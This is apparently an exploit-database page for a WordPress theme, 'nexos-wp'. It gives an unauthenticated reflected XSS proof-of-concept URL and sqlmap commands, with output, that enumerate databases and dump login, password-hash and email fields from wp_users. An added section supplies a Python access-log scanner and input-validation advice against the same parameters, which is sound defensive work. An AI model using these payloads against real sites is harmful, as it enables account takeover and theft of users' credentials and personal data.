## https://sploitus.com/exploit?id=WPEX-ID:10285
### PoC Unauthenticated Reflected XSS:

```
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>
```

### PoC SQL Injection:

```
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs  --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]
```
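
A defender-side check for the two parameters shown above, as an added example that is not part of the original advisory: it scans web access-log lines and flags `search_order` values that are not a bare column name with an optional `ASC`/`DESC`, and `search_location` values that contain markup characters. The log lines are constructed, and the access-log request format and the accepted `search_order` shape are assumptions based on the one legitimate value the page shows.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed legitimate shape, taken from the page's "idlisting DESC":
# one column identifier, optionally followed by a sort direction.
ORDER_OK = re.compile(r"[A-Za-z_][A-Za-z0-9_]*( (ASC|DESC))?", re.IGNORECASE)
# Characters that let a reflected value break out of an HTML attribute or tag.
MARKUP = re.compile(r"[<>\"'`]")
# Request part of a common/combined access-log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def check_request(line):
    """Return (parameter, decoded value) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values, so encoded payloads are compared decoded.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    findings = []
    for value in params.get("search_order", []):
        if not ORDER_OK.fullmatch(value):
            findings.append(("search_order", value))
    for value in params.get("search_location", []):
        if MARKUP.search(value):
            findings.append(("search_location", value))
    return findings


def scan(lines):
    """Map line index -> findings, only for lines that have any."""
    return {i: f for i, line in enumerate(lines) if (f := check_request(line))}


# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:02:23:30 +0000] "GET /nexos-wp/side-map/'
    '?search_order=idlisting%20DESC&search_location=Berlin HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:02:23:33 +0000] "GET /nexos-wp/side-map/'
    '?search_order=idlisting%20DESC%2C(SELECT%201) HTTP/1.1" 200 5090',
    '203.0.113.9 - - [01/Jan/2024:02:24:01 +0000] "GET /nexos-wp/top-map/'
    '?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src%3Dx'
    '%20onerror%3Dalert(%60XSS%60)%3E HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

The same two rules work as server-side input validation: reject any `search_order` that fails the allow-list pattern before it reaches the query, and HTML-escape `search_location` wherever it is echoed.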